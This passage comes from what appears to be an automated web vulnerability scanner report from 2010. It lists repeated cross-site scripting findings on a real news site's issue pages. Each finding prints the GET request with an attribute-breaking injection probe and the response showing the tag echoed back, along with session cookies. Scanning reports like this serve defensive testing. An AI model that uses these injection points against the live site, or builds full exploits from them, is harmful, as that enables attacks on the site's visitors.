The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c54b"><a>4cbaf84c7f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/16-121c54b"><a>4cbaf84c7f1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:07:01 GMT
Date: Mon, 22 Nov 2010 01:03:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_16-121c54b"><a>4cbaf84c7f1">
...[SNIP]...

1.1365. http://www.wired.com/wired/issue/17-01 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d4f"><a>120753b7ddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issuef3d4f"><a>120753b7ddd/17-01 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:05:57 GMT
Date: Mon, 22 Nov 2010 01:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issuef3d4f"><a>120753b7ddd c_17-01">
...[SNIP]...

1.1366. http://www.wired.com/wired/issue/17-01 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba0a"><a>b4ec8eb31ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-01fba0a"><a>b4ec8eb31ef HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:07:13 GMT
Date: Mon, 22 Nov 2010 01:03:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-01fba0a"><a>b4ec8eb31ef">
...[SNIP]...

1.1367. http://www.wired.com/wired/issue/17-02 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-02

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715a4"><a>7789c2854ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue715a4"><a>7789c2854ae/17-02 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:06:20 GMT
Date: Mon, 22 Nov 2010 01:02:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue715a4"><a>7789c2854ae c_17-02">
...[SNIP]...

1.1368. http://www.wired.com/wired/issue/17-02 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-02

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328c0"><a>0a02706438d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-02328c0"><a>0a02706438d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Mon, 22 Nov 2010 01:07:00 GMT
Date: Mon, 22 Nov 2010 01:03:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-02328c0"><a>0a02706438d">
...[SNIP]...

1.1369. http://www.wired.com/wired/issue/17-03 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-03

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d8b"><a>04647b3dbcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue75d8b"><a>04647b3dbcd/17-03 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:06:28 GMT
Date: Mon, 22 Nov 2010 01:02:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue75d8b"><a>04647b3dbcd c_17-03">
...[SNIP]...

1.1370. http://www.wired.com/wired/issue/17-03 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-03

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55665"><a>72948330198 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-0355665"><a>72948330198 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Mon, 22 Nov 2010 01:06:59 GMT
Date: Mon, 22 Nov 2010 01:03:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-0355665"><a>72948330198">
...[SNIP]...

1.1371. http://www.wired.com/wired/issue/17-04 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-04

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ef3"><a>57259787c53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue20ef3"><a>57259787c53/17-04 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:06:27 GMT
Date: Mon, 22 Nov 2010 01:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue20ef3"><a>57259787c53 c_17-04">
...[SNIP]...

1.1372. http://www.wired.com/wired/issue/17-04 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-04

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdd1"><a>9f7ac2fc7e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-045cdd1"><a>9f7ac2fc7e2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:07:00 GMT
Date: Mon, 22 Nov 2010 01:03:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-045cdd1"><a>9f7ac2fc7e2">
...[SNIP]...

1.1373. http://www.wired.com/wired/issue/17-05 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-05

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f4a"><a>96ed1f40f40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue83f4a"><a>96ed1f40f40/17-05 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:05:58 GMT
Date: Mon, 22 Nov 2010 01:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue83f4a"><a>96ed1f40f40 c_17-05">
...[SNIP]...

1.1374. http://www.wired.com/wired/issue/17-05 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-05

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef828"><a>381362cea6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-05ef828"><a>381362cea6d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:06:57 GMT
Date: Mon, 22 Nov 2010 01:03:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-05ef828"><a>381362cea6d">
...[SNIP]...

1.1375. http://www.wired.com/wired/issue/17-06 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-06

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accf4"><a>f11fb1bdd52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issueaccf4"><a>f11fb1bdd52/17-06 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:05:53 GMT
Date: Mon, 22 Nov 2010 01:01:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issueaccf4"><a>f11fb1bdd52 c_17-06">
...[SNIP]...

1.1376. http://www.wired.com/wired/issue/17-06 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-06

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bc0"><a>3f86a5f38af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-06d2bc0"><a>3f86a5f38af HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:06:28 GMT
Date: Mon, 22 Nov 2010 01:02:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-06d2bc0"><a>3f86a5f38af">
...[SNIP]...

1.1377. http://www.wired.com/wired/issue/17-07 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-07

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79712"><a>eb8ee9010ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue79712"><a>eb8ee9010ab/17-07 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:06:12 GMT
Date: Mon, 22 Nov 2010 01:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue79712"><a>eb8ee9010ab c_17-07">
...[SNIP]...

1.1378. http://www.wired.com/wired/issue/17-07 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-07

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fee2"><a>91dd18ca45c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/17-074fee2"><a>91dd18ca45c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:07:08 GMT
Date: Mon, 22 Nov 2010 01:03:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_17-074fee2"><a>91dd18ca45c">
...[SNIP]...

1.1379. http://www.wired.com/wired/issue/17-08 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-08

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d807e"><a>d5632562e89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issued807e"><a>d5632562e89/17-08 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:05:40 GMT
Date: Mon, 22 Nov 2010 01:01:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issued807e"><a>d5632562e89 c_17-08">
...[SNIP]...

1.1380. http://www.wired.com/wired/issue/17-08 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/17-08

Issue detail

